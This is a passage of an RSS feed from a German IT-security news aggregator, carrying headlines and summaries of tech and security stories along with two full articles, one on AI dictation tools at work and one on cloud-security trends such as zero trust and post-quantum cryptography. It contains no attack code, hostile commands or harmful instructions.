<content:encoded><![CDATA[<p>Synthetic media has moved from technical curiosity to mainstream threat in just a few years, with deepfakes now cheap enough to produce that a free app and a handful of seconds of scraped audio can generate convincing fakes. The consequences stretch well beyond political misinformation: corporate fraud running into tens of millions of dollars, biometric […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/01/qa-solving-synthetic-media-challenges-before-all-trust-is-lost/">Q&amp;A: Solving Synthetic Media Challenges Before All Trust is Lost</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The industries being reimagined by AI]]></title>
<description><![CDATA[Throughout human history, technology has changed what we think is possible. Once, communication meant sending a letter. Now, we are all buried under a constant stream of emails, messages and notifications. AI marks another major inflection point. For the first time, ordinary people can communicat...]]></description>
<link>https://tsecurity.de/de/3652145/it-security-nachrichten/the-industries-being-reimagined-by-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652145/it-security-nachrichten/the-industries-being-reimagined-by-ai/</guid>
<pubDate>Tue, 07 Jul 2026 18:25:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Throughout human history, technology has changed what we think is possible. Once, communication meant sending a letter. Now, we are all buried under a constant stream of emails, messages and notifications. AI marks another major inflection point. For the first time, ordinary people can communicate with computers in natural language, not code. That shift is […]</p>
<p>The post <a href="https://www.itsecurityguru.org/2026/07/02/the-industries-being-reimagined-by-ai/">The industries being reimagined by AI</a> appeared first on <a href="https://www.itsecurityguru.org/">IT Security Guru</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China eyes export curbs on its top AI models, and Europe is caught in the middle]]></title>
<description><![CDATA[According to Reuters, Chinese authorities are looking into restricting foreign access to the country's most powerful AI models. Alibaba, Bytedance, and Z.ai would all be affected. The move means both superpowers now treat AI as a strategic asset. For Europe, the convenient shortcut of relying on ...]]></description>
<link>https://tsecurity.de/de/3652106/ai-nachrichten/china-eyes-export-curbs-on-its-top-ai-models-and-europe-is-caught-in-the-middle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652106/ai-nachrichten/china-eyes-export-curbs-on-its-top-ai-models-and-europe-is-caught-in-the-middle/</guid>
<pubDate>Tue, 07 Jul 2026 18:19:28 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="2048" height="1152" src="https://the-decoder.com/wp-content/uploads/2026/07/Europe-AI-Race-in-the-Middle.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        According to Reuters, Chinese authorities are looking into restricting foreign access to the country's most powerful AI models. Alibaba, Bytedance, and Z.ai would all be affected. The move means both superpowers now treat AI as a strategic asset. For Europe, the convenient shortcut of relying on cheap Chinese open-source models could close much faster than expected.</p>
<p>The article <a href="https://the-decoder.com/china-eyes-export-curbs-on-its-top-ai-models-and-europe-is-caught-in-the-middle/">China eyes export curbs on its top AI models, and Europe is caught in the middle</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Want a cheap Shark fan this summer? Amazon just knocked up to $70 off top-rated models — and these are my 3 expert picks]]></title>
<description><![CDATA[Enjoy a cooling breeze with a super-fine mist of water to keep you feeling refreshed this summer.]]></description>
<link>https://tsecurity.de/de/3652070/it-nachrichten/want-a-cheap-shark-fan-this-summer-amazon-just-knocked-up-to-70-off-top-rated-models-and-these-are-my-3-expert-picks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652070/it-nachrichten/want-a-cheap-shark-fan-this-summer-amazon-just-knocked-up-to-70-off-top-rated-models-and-these-are-my-3-expert-picks/</guid>
<pubDate>Tue, 07 Jul 2026 18:05:04 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Enjoy a cooling breeze with a super-fine mist of water to keep you feeling refreshed this summer.]]></content:encoded>
</item>
<item>
<title><![CDATA[STOCKSTAY Backdoor Uses Malicious RDP Files and WinRAR Exploit to Target Ukraine]]></title>
<description><![CDATA[A newly detailed cyber-espionage campaign is using fake remote desktop files and a recently patched WinRAR flaw to plant a stealthy backdoor called STOCKSTAY on computers in Ukraine. The malware disguises itself as everyday software, including stock market trackers and calculator apps, to avoid r...]]></description>
<link>https://tsecurity.de/de/3651869/it-security-nachrichten/stockstay-backdoor-uses-malicious-rdp-files-and-winrar-exploit-to-target-ukraine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651869/it-security-nachrichten/stockstay-backdoor-uses-malicious-rdp-files-and-winrar-exploit-to-target-ukraine/</guid>
<pubDate>Tue, 07 Jul 2026 16:38:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly detailed cyber-espionage campaign is using fake remote desktop files and a recently patched WinRAR flaw to plant a stealthy backdoor called STOCKSTAY on computers in Ukraine. The malware disguises itself as everyday software, including stock market trackers and calculator apps, to avoid raising suspicion while it quietly collects information from infected machines. STOCKSTAY […]</p>
<p>The post <a href="https://cybersecuritynews.com/stockstay-backdoor-uses-malicious-rdp-files/">STOCKSTAY Backdoor Uses Malicious RDP Files and WinRAR Exploit to Target Ukraine</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[DRAM prices are killing the cheap smartphone]]></title>
<description><![CDATA[Now eats 60% of a sub-$400 handset's bill of materials and it's only getting worse]]></description>
<link>https://tsecurity.de/de/3651582/it-nachrichten/dram-prices-are-killing-the-cheap-smartphone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651582/it-nachrichten/dram-prices-are-killing-the-cheap-smartphone/</guid>
<pubDate>Tue, 07 Jul 2026 15:03:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Now eats 60% of a sub-$400 handset's bill of materials and it's only getting worse]]></content:encoded>
</item>
<item>
<title><![CDATA[IQM acquires Quantistry assets for quantum solutions]]></title>
<description><![CDATA[IQM Quantum Computers has completed the acquisition of selected assets from Quantistry, a Berlin-based developer of cloud-based simulation workflow platforms, for an undisclosed sum. This article has been indexed from CyberMaterial Read the original article: IQM acquires Quantistry assets for…
Re...]]></description>
<link>https://tsecurity.de/de/3651564/it-security-nachrichten/iqm-acquires-quantistry-assets-for-quantum-solutions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651564/it-security-nachrichten/iqm-acquires-quantistry-assets-for-quantum-solutions/</guid>
<pubDate>Tue, 07 Jul 2026 14:52:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>IQM Quantum Computers has completed the acquisition of selected assets from Quantistry, a Berlin-based developer of cloud-based simulation workflow platforms, for an undisclosed sum. This article has been indexed from CyberMaterial Read the original article: IQM acquires Quantistry assets for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/iqm-acquires-quantistry-assets-for-quantum-solutions/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/iqm-acquires-quantistry-assets-for-quantum-solutions/">IQM acquires Quantistry assets for quantum solutions</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Turtlebox Cub Review: My New Favorite Rugged Bluetooth Speaker, but It's Not Cheap]]></title>
<description><![CDATA[The Cub hits a sweet spot in Turtlebox's Bluetooth speaker lineup between its Original (Gen 3) and Ranger models. But is it worth $330?]]></description>
<link>https://tsecurity.de/de/3651479/it-nachrichten/turtlebox-cub-review-my-new-favorite-rugged-bluetooth-speaker-but-its-not-cheap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651479/it-nachrichten/turtlebox-cub-review-my-new-favorite-rugged-bluetooth-speaker-but-its-not-cheap/</guid>
<pubDate>Tue, 07 Jul 2026 14:18:36 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Cub hits a sweet spot in Turtlebox's Bluetooth speaker lineup between its Original (Gen 3) and Ranger models. But is it worth $330?]]></content:encoded>
</item>
<item>
<title><![CDATA[Reuters: DeepSeek is developing its own AI chips]]></title>
<description><![CDATA[DeepSeek, the Chinese company making AI models on the cheap, might look to do the same for AI chips.]]></description>
<link>https://tsecurity.de/de/3651420/it-nachrichten/reuters-deepseek-is-developing-its-own-ai-chips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651420/it-nachrichten/reuters-deepseek-is-developing-its-own-ai-chips/</guid>
<pubDate>Tue, 07 Jul 2026 14:03:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[DeepSeek, the Chinese company making AI models on the cheap, might look to do the same for AI chips.]]></content:encoded>
</item>
<item>
<title><![CDATA[Talk, talk, talk: The rise of AI dictation tools at work]]></title>
<description><![CDATA[For workers who routinely spend hours a day interacting with various AI assistants, banging out prompts on a keyboard can quickly become a chore. 



“Whether it’s a coding task, helping write a document or think about strategy — there’s just so much typing and typing and typing you do as a part ...]]></description>
<link>https://tsecurity.de/de/3651342/it-nachrichten/talk-talk-talk-the-rise-of-ai-dictation-tools-at-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651342/it-nachrichten/talk-talk-talk-the-rise-of-ai-dictation-tools-at-work/</guid>
<pubDate>Tue, 07 Jul 2026 13:32:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For workers who routinely spend hours a day interacting with various AI assistants, banging out prompts on a keyboard can quickly become a chore. </p>



<p>“Whether it’s a coding task, helping write a document or think about strategy — there’s just so much typing and typing and typing you do as a part of that,” said <a href="https://www.linkedin.com/in/patalano" target="_blank" rel="noreferrer noopener">Chris Patalano</a>, chief technology officer at Thumbtack, an online marketplace for professional services.</p>



<p>With that in mind, Patalano and other senior colleagues last year began experimenting with new ways to interact with AI systems within Thumbtack. The idea was to test AI-assisted dictation tools developed by startups such as <a href="https://www.monologue.to/" target="_blank" rel="noreferrer noopener">Monologue</a>, <a href="https://superwhisper.com/" target="_blank" rel="noreferrer noopener">Superwhisper</a>, <a href="https://willowvoice.com/">Willow </a><a href="https://willowvoice.com/" target="_blank" rel="noreferrer noopener">Voice</a>, and <a href="https://wisprflow.ai/" target="_blank" rel="noreferrer noopener">Wispr</a>. </p>



<p>Unlike previous generations of dictation apps that aimed to produce a verbatim transcript, newer tools rely on large language models (LLMs) to craft polished, edited text. The companies behind them claim users can produce text several times faster than typing, with greater accuracy than voice tools built into other apps.</p>



<p>That has sparked renewed interest in <a href="https://www.computerworld.com/article/4175881/ai-will-kill-the-skill-of-typing.html">using voice prompts to carry out routine tasks</a> in the workplace.</p>



<p>After one of Thumbtack’s principal engineers suggested Wispr Flow, Patalano kicked off a small pilot project with a handful of colleagues over a couple of months. The pilot was a success, and Wispr Flow is now available to more than 200 IT and engineering staffers; they use it for a variety of tasks, including interactions with AI assistants and drafting Slack messages to colleagues.<em> </em></p>



<p>Although Patalano said he still prefers typing for certain apps, Wispr Flow’s AI dictation tool has become a part of his daily workflow. “It’s becoming the primary interface that I have for any AI tools. It’s just so much more effective and efficient than having to type,” he said. </p>



<p>“I’ve used it to help me build prototypes, explore the code base, help me explore my own technical strategy. I’ve used it to do analytics across data sets — even very specific acute things, like ‘What do I need to make sure is on my to-do list this week?’”</p>



<h2 class="wp-block-heading">A new generation of dictation tools</h2>



<p>Software that translates spoken words into text isn’t new to the workplace. Speech-to-text dictation tools have been around in various forms for decades. The earliest example dates back to 1952, when Bell Labs created Audrey, widely regarded as the first automatic speech recognition system. (Audrey <a href="https://www.bbc.com/future/article/20170214-the-machines-that-learned-to-listen" target="_blank" rel="noreferrer noopener">could recognize the spoken digits 0-9</a> with 90% accuracy when used by the machine’s developer, HK Davis.) </p>



<p>Commercial products appeared in the 1980s, with broader adoption in the 1990s via software such as Dragon Dictate. These were specialized — and expensive — applications with limited functionality, appealing mostly to professionals for whom dictation was already a part of their workflow, such as doctors and lawyers, rather than a wide range of office workers. </p>



<p>In recent years, speech-to-text software has become more accessible, especially  with the integration of speech recognition into smartphones and computers by Apple, Google, Microsoft, and others. Deep learning has also significantly improved accuracy.</p>



<p>That’s made <a href="https://www.theguardian.com/technology/2026/may/12/end-of-typing-workers-ditching-keyboards-voicepilling-ai-dictation" target="_blank" rel="noreferrer noopener">voice input more common in the workplace</a> and an important accessibility tool for people who find typing difficult — even though the systems can still be “quite brittle,” said <a href="https://people.ucd.ie/benjamin.cowan" target="_blank" rel="noreferrer noopener">Benjamin Cowan</a>, professor at the School of Information and Communication Studies at University College Dublin. That’s especially true of early voice input technology.</p>



<p>“Not only did they get things wrong all the time, they wrote everything you said — even if you didn’t want it to,” he said. “This meant that a lot of time was taken editing the notes after they were dictated.” </p>



<p>Now, several startups offering AI dictation tools, including Wispr, aim to make voice a viable alternative to typing for everyday computer tasks. The key difference from earlier iterations of tools is the use of AI models to edit text in near-real-time, removing disfluencies such as “umms,” “ahhs” and filler words to create a polished sentence. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Snippets.png?w=1024" alt="Whispr Flow snippets" class="wp-image-4193385" width="1024" height="674" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Whispr Flow offers shortcuts, or “snippets” with its voice tool.</p>
</figcaption></figure><p class="imageCredit">Whispr Flow snippets</p></div>



<p>In most cases, users can invoke an AI dictation tool across mobile and desktop applications with a text field – whether that’s a document editor, email client, a vibe-coding app or anything else – by pressing and holding a designated key or button while talking. Users can add words to the app’s dictionary so it can pick up on uncommon names, abbreviations, and industry jargon.</p>



<p>“The technology itself has improved dramatically” compared to previous tools that sought to transcribe speech verbatim and could be frustratingly inaccurate, said <a href="https://uk.linkedin.com/in/mariabell" target="_blank" rel="noreferrer noopener">Maria Bell</a>, senior research analyst at CCS Insight.  </p>



<p>“These modern systems are much more contextual; they understand your intent, they can help structure your thoughts and rewrite while you speak. They function more like writing assistants rather than just dictation.”</p>



<p>Wispr is among the best-funded startups in the market, having raised $81 million to date.<em> </em><a href="https://www.bloomberg.com/news/articles/2026-05-12/ai-dictation-startup-wispr-in-funding-talks-at-2-billion-value" target="_blank" rel="noreferrer noopener">Bloomberg reported in May</a> that the company was in talks to raise a further $260 million at a $2 billion valuation. Other vendors have also attracted investor backing, with Willow Voice <a href="https://x.com/_allanguo/status/1945185671054024828" target="_blank" rel="noreferrer noopener">announcing a $4.2 million funding round</a> last year.</p>



<p>The software is typically available via a freemium model, with a free tier offering basic functionality and usage limits alongside paid premium versions. Superwhisper Pro is $8.49 per user each month; Willow Voice’s Team Pro and Individual Pro are $10 and $12 per user each month, respectively; and Wispr Flow Pro costs $12 per user each month. Enterprise pricing is not publicly available from these vendors.</p>



<p>Larger tech firms have also invested in AI-assisted voice functionality. Apple, for instance, <a href="https://www.apple.com/newsroom/2026/06/apple-introduces-siri-ai-a-profoundly-more-capable-and-personal-assistant/%23:~:text=Users%2520have%2520the%2520ability%2520to%2520customize%2520the%2520expressiveness%2520and%2520pace%2520of%2520Siri%25E2%2580%2599s%2520voice,accurately,%2520and%2520as%2520intended." target="_blank" rel="noreferrer noopener">recently announced</a> AI-powered dictation for its <a href="https://www.computerworld.com/article/4184484/siri-ai-is-all-apple-it-just-needed-google-to-get-there.html">revamped Siri AI assistant</a>, while Google is building in <a href="https://blog.google/products-and-platforms/platforms/android/gemini-intelligence/%23:~:text=Turn%2520spoken%2520thoughts%2520into%2520polished%2520text" target="_blank" rel="noreferrer noopener">similar functionality</a> for the <a href="https://www.computerworld.com/article/4026831/android-voice-typing.html">Gboard keyboard</a> on Android devices. Google is also developing a standalone AI dictation tool – <a href="https://www.computerworld.com/article/4156760/googles-new-ai-app-is-a-glimpse-of-the-future.html">Edge Eloquent</a> – although its approach differs from that of startups in the space because the tool is not available across separate applications.</p>



<h2 class="wp-block-heading">Why use AI dictation?</h2>



<p>The key promise of AI dictation is that it can increase a knowledge worker’s words-per-minute (wpm) output versus typing. </p>



<p><a href="https://superwhisper.com/typing-speed-test" target="_blank" rel="noreferrer noopener">According to Superwhisper</a>, most office workers can knock out between 40 and 70 words a minute on a  keyboard, though some can be much faster. (<em>New York Times</em> reporters vary from 36 to 134 wpm, according to a <em>Times</em> <a href="https://www.nytimes.com/2026/03/25/insider/how-fast-journalists-type.html" target="_blank" rel="noreferrer noopener">article earlier this year</a>.) People talk much faster, at a rate of 160 to 180 wpm, and AI dictation app vendors promise low latency processing to turn speech into edited text (usually less than a second; some claim under 200 milliseconds).</p>



<p>It’s not just about speed: Willow Voice, for instance, claims its app is three times more accurate than dictation tools built into other applications. </p>



<p>The prospect of accelerating routine writing and communication tasks has obvious appeal, particularly as AI threatens to increase rather than reduce the burden on office workers. “We all feel like we’re working faster – we have to do more with less time,” said Bell. </p>



<p>“Employees are overloaded with communication work, and they’re spending huge amounts of time every day writing emails, messaging colleagues, using generative AI,” she said. “Voice tools are appealing because some feel they can do wor] faster. It reduces friction around all the tasks they’re being asked to do.”</p>



<p>The technology is potentially suited to a variety of jobs, said Cowan — not only those that require dictation — helping with tasks such as writing to-do lists and documents, or sending messages and emails. </p>



<p>Accessibility is important, too. “These dictation tools also mean that people who find it hard to type or cannot type now have much better apps to help them with writing,” said Cowan. </p>



<h2 class="wp-block-heading">What’s holding the technology back?</h2>



<p>Despite these potential benefits, the idea of talking to a laptop or smartphone throughout the day might not be appealing for a lot of people, particularly those in a busy office. </p>



<p>“Some might find it embarrassing or uncomfortable, they’ll be worried about distracting colleagues or creating a disruption,” said Bell. “That’s still a major behavioral barrier that you have to overcome. </p>



<p>“The technology is ready, but maybe workplace etiquette and culture is not necessarily there yet,” she said.</p>



<p>Working remotely, Patalano said he and his team can side-step some of this awkwardness. But it still took time to adjust to voice inputs.<em> </em></p>



<p>“Because we’re fully remote, we don’t have the challenge of everybody sitting side by side in an office talking into their computers, which would be more challenging, I suspect. But even getting comfortable with talking out loud alone in a room took a minute,” he said. </p>



<p>As with any AI tool, there’s also the question of accuracy. </p>



<p>Even if vendors promise a low error rate, LLM outputs can still have errors, requiring users to check the results. “They can still mis-recognize what’s being said,” said Cowan. Those in high-risk sectors such as healthcare still need to go through the AI-edited text and “double- and triple-check” the dictation. </p>



<p>This friction means extra steps for a user working with the technology. </p>



<p>It doesn’t take much to dissuade workers from adopting a new tool, said <a href="https://www.jarnoldassociates.com/about/jon-arnold" target="_blank" rel="noreferrer noopener">Jon Arnold</a>, research analyst at J Arnold &amp; Associates. “There’s definitely a lot of use cases where it would have a lot of value, but you’ve got to trust it — if it’s not giving what you think it will, you’re either going to fine tune it or go back to the keyboard and do it the old-fashioned way,” he said.</p>



<p>There are also privacy concerns. Because some tools send voice data to the cloud for processing, organizations in heavily regulated industries such as finance, healthcare and government might move cautiously.</p>



<p>Bell points to two types of privacy: social, such as “having colleagues overhear what you’re saying,” and digital privacy, which relates to who else can access the conversation data. </p>



<p>App providers take different approaches; some process voice data on device, others send it to the cloud. That’s an important distinction for organizations with strict data protection requirements, said Bell. </p>



<p>“Where’s the voice data processed? Where is it stored? How can it be accessed? Enterprises are very, very focused on governance and data security and data privacy,” she said.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/05/evan-yang-LPAYmP4KSrg-unsplash.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Rusty keyboard on the ground" class="wp-image-4175785" width="1024" height="683" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><a href="https://unsplash.com/@__evanyang__" target="_blank" class="imageCredit" rel="noopener">Evan Yang</a></div>



<h2 class="wp-block-heading">Too soon to ditch the keyboard?</h2>



<p>Despite growing interest in the technology, it’s still unclear whether a large number of workers will choose talking over typing. And remains to be seen whether startups that offer a best-of-breed AI dictation app can gain traction, or fade if the technology simply becomes embedded within the software ecosystems of larger tech firms.  </p>



<p>Workers are more familiar with voice technology, thanks to AI assistants in smartphones and smart speakers at home. That, said Bell, could improve the prospects of wider use in business settings. </p>



<p>“Voice interaction feels less niche than it did about five years ago,” she said. “Overall, the technology is improving quickly…, but how we’re really going to determine success is whether we can change human behavior.”</p>



<p>Arnold is bullish about the use of voice technology in the workplace: “Five or 10 years [from now], we won’t think twice about it. It’ll just be the norm.”</p>



<p>Bell is more cautious.She sees potential for AI dictation as a supplementary tool for communication-heavy work. “I don’t think it’s going to replace the keyboard, but I do think it could become a secondary interface,” she said.</p>



<p>Even Patalano doesn’t expect AI-assisted voice dictation to entirely replace typing “Your speaking voice and your written voice will always, to some degree, be different, and that’s okay: we should probably lean into that,” he said.</p>



<p>“I think there will always be a place for wordsmithing, crafting, writing – and the same with coding, too. There’s going to be lots of cases where every single word matters.”</p>



<p>He plans to continue using AI dictation, whether with Wispr Flow or other similar tools that might emerge in the future.  </p>



<p>While a lack of accuracy slowed adoption in the past, continued advances could open the door to wider workplace uptake.  </p>



<p>“When I try to use a voice tool and it misses even once, you kind of throw up your hands and walk away, because the cost of having to correct it is way more than the benefit of using it versus typing,” Patalano said. “But, especially with the improvements in LLMs and AI models generally, the accuracy of these is going to keep getting better and better. </p>



<p>“I’m already looking for more and more opportunities to use voice instead of having to type.” </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA['You could've given me 10 guesses, I wouldn't have gone for this': my favorite cheap Nothing earbuds finally have a successor, but the USP isn't my idea of 'joyful']]></title>
<description><![CDATA[Nothing's new Ear (3a) don't just deal in the odd use of parentheses and new colorways; there's also on-ear chat recording and a host of new features]]></description>
<link>https://tsecurity.de/de/3651193/it-nachrichten/you-couldve-given-me-10-guesses-i-wouldnt-have-gone-for-this-my-favorite-cheap-nothing-earbuds-finally-have-a-successor-but-the-usp-isnt-my-idea-of-joyful/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651193/it-nachrichten/you-couldve-given-me-10-guesses-i-wouldnt-have-gone-for-this-my-favorite-cheap-nothing-earbuds-finally-have-a-successor-but-the-usp-isnt-my-idea-of-joyful/</guid>
<pubDate>Tue, 07 Jul 2026 12:32:46 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nothing's new Ear (3a) don't just deal in the odd use of parentheses and new colorways; there's also on-ear chat recording and a host of new features]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s new in cloud security]]></title>
<description><![CDATA[The cloud security landscape has changed dramatically in recent years, and 2026 presents a completely different scenario. The integration of advanced AI, autonomous agent systems, and the looming threat of quantum computing all require a new security approach, unlike the strategies that have work...]]></description>
<link>https://tsecurity.de/de/3650968/ai-nachrichten/whats-new-in-cloud-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650968/ai-nachrichten/whats-new-in-cloud-security/</guid>
<pubDate>Tue, 07 Jul 2026 11:04:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The cloud security landscape has changed dramatically in recent years, and 2026 presents a completely different scenario. The integration of advanced AI, <a href="https://www.infoworld.com/article/3611465/how-ai-agents-will-transform-the-future-of-work.html">autonomous agent</a> systems, and the looming threat of quantum computing all require a new security approach, unlike the strategies that have worked for the past decade. While threats have obviously evolved, you might be surprised by how much defensive technologies and architectural strategies have advanced, too.</p>



<p>I have been tracking security across the cloud industry throughout 2026, and three trends have emerged as the most consequential developments that every technology leader needs to understand. These are not minor adjustments to existing security postures. They are fundamental shifts in how we protect cloud infrastructure, with implications that extend well beyond the security team into broader architectural issues.</p>



<h2 class="wp-block-heading">Zero-trust architecture </h2>



<p>The most notable trend is the rapid adoption of <a href="https://www.csoonline.com/article/564201/what-is-zero-trust-a-model-for-more-effective-security.html">zero-trust architecture</a> among enterprises in cloud environments. Gartner predicts that by 2026, 10% of large companies will have a fully developed zero-trust program, compared with less than 1% today. This is not merely a forecast but reflects current industry shifts as organizations recognize that traditional perimeter-based security is ineffective in a landscape where workloads span multiple clouds, remote workers connect from home networks, and applications run in hybrid architectures.</p>



<p>Zero-trust is based on a fundamentally different approach compared to earlier security models. Instead of trusting internal network traffic by default, it treats every access request as potentially malicious, regardless of the source. This approach involves constant identity verification, strict adherence to least-privilege principles, and micro-segmentation of network resources to reduce the impact of potential breaches.</p>



<p>The shift from focusing solely on network security to emphasizing identity-based security is especially important in cloud settings. Solutions like Microsoft Entra ID and Okta have become the foundation for zero-trust architectures, supporting both <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> and on-premises systems. According to the Cloud Security Alliance, many zero-trust efforts fail at the network level because organizations still depend on firewalls and VPNs that base trust on traffic origin rather than who is requesting access or what they are trying to reach. Successful zero-trust implementations have moved past this limitation by viewing identity as the actual perimeter.</p>



<p>For enterprise readers, the message is clear. If your organization has not yet launched a serious zero-trust initiative, you are falling behind. This is no longer a forward-thinking security enhancement. It is the baseline expectation for any organization running significant workloads in the cloud.</p>



<h2 class="wp-block-heading">Quantum-safe cryptography</h2>



<p>A second major trend in 2026 is the rising focus on quantum-safe encryption in cloud environments. <a href="https://www.infoworld.com/article/2260047/what-is-quantum-computing-solutions-to-impossible-problems.html">Quantum computing</a> was long seen as a distant threat to be addressed “someday” as the technology matured. That complacency is no longer justified. IBM recently marked a decade of quantum cloud access, and quantum capabilities are advancing so fast that our current cryptographic security foundations are becoming vulnerable.</p>



<p>The concern is straightforward. Current encryption, especially public key cryptography, relies on hard mathematical problems that classical computers can’t solve easily. Quantum computers will eventually solve many of these problems, making current encryption standards obsolete. A major worry is the “harvest now, decrypt later” strategy, in which adversaries capture encrypted data now and plan to decrypt it later when quantum computers become available.</p>



<p>IBM Quantum Safe is one of the most comprehensive responses to this challenge in the cloud industry. The platform provides tools and services to help organizations migrate to post-quantum cryptographic standards, ensuring that sensitive data protected today will remain secure in a future where quantum attacks are possible. Microsoft has made similar advances in post-quantum cryptography, collaborating with global standards bodies to develop algorithms that can withstand both classical and quantum attacks.</p>



<p>If your organization handles long-lived sensitive data, operates in regulated industries, or maintains classified information, you need to be thinking about quantum-safe cryptography now. The migration to new cryptographic standards cannot be accomplished overnight, and organizations that wait until quantum computers pose an immediate threat will find themselves in a difficult position.</p>



<h2 class="wp-block-heading">AI is both threat and defense</h2>



<p>The third trend transforming cloud security in 2026 is AI’s dual role as both an attacker force multiplier and a vital component of defense. This complexity is one of the most challenging aspects for security leaders, as AI investments may both enhance and undermine security, depending on their implementation and governance.</p>



<p>The threat landscape has become more prominent over the past year. According to <a href="https://go.crowdstrike.com/2026-global-threat-report.html?utm_campaign=thih&amp;utm_content=crwd-saia-amer-us-en-psp-x-wht-frntl-tct_x_x_x-x-x&amp;utm_medium=sem&amp;utm_source=goog&amp;utm_term=global%20threat%20report%202026&amp;utm_language=en-us&amp;cq_cmp=1705069828&amp;cq_plac=&amp;gad_source=1&amp;gad_campaignid=1705069828&amp;gbraid=0AAAAAC-K3YSXKPYg-61_LSZ4H1RmUljxl&amp;gclid=CjwKCAjwpK3SBhASEiwAtV1SPE7UvgI5bnpayE-VNwKAXa5rcBzHcO2RJRHuk-vulZNKOR3Y6oyM8xoC4vkQAvD_BwE#form">CrowdStrike’s 2026 Global Threat Report</a>, AI is facilitating more advanced attacks, with more than 90 organizations reporting breaches involving legitimate AI tools used as attack channels. Adversarial techniques such as data poisoning and model inversion pose practical risks that organizations need to consider when deploying AI systems in operational settings. Furthermore, the proliferation of deepfakes and AI-generated synthetic media complicates <a href="https://www.csoonline.com/article/518296/what-is-iam-identity-and-access-management-explained.html">identity verification</a> and social engineering defense strategies.</p>



<p>However, the defensive side of the AI equation is equally powerful and rapidly maturing. AI-powered security tools enable early detection of anomalies, dramatically reduce incident response times, and eliminate the false-positive fatigue that has plagued security operations teams for years. SentinelOne and other endpoint security platforms have used AI to detect threats that would be invisible to traditional signature-based systems.</p>



<p>Perhaps most importantly, the rise of agentic AI systems in enterprises introduces a new security challenge: managing non-human identities. As autonomous AI agents run nonstop across cloud environments, each one becomes an identity requiring protection, oversight, and regulation. <a href="https://labs.cloudsecurityalliance.org/research/csa-whitepaper-nonhuman-identity-agentic-ai-governance-v1-cs/">The Cloud Security Alliance has identified non-human identity governance</a> as the key security gap in the age of agentic AI, emphasizing the need for a complete framework to handle AI agent identities, just as organizations do with human user identities.</p>



<h2 class="wp-block-heading">The speed of change</h2>



<p>These three trends are interconnected, creating a more complex and significant security landscape than ever before. Zero-trust relies on identity verification, which AI systems must support. Quantum-safe cryptography must be implemented carefully to prevent vulnerabilities that AI-driven attacks could exploit. Additionally, as AI agents become an increasingly important part of your digital workforce, integrating non-human identity management into your overall security framework is essential.</p>



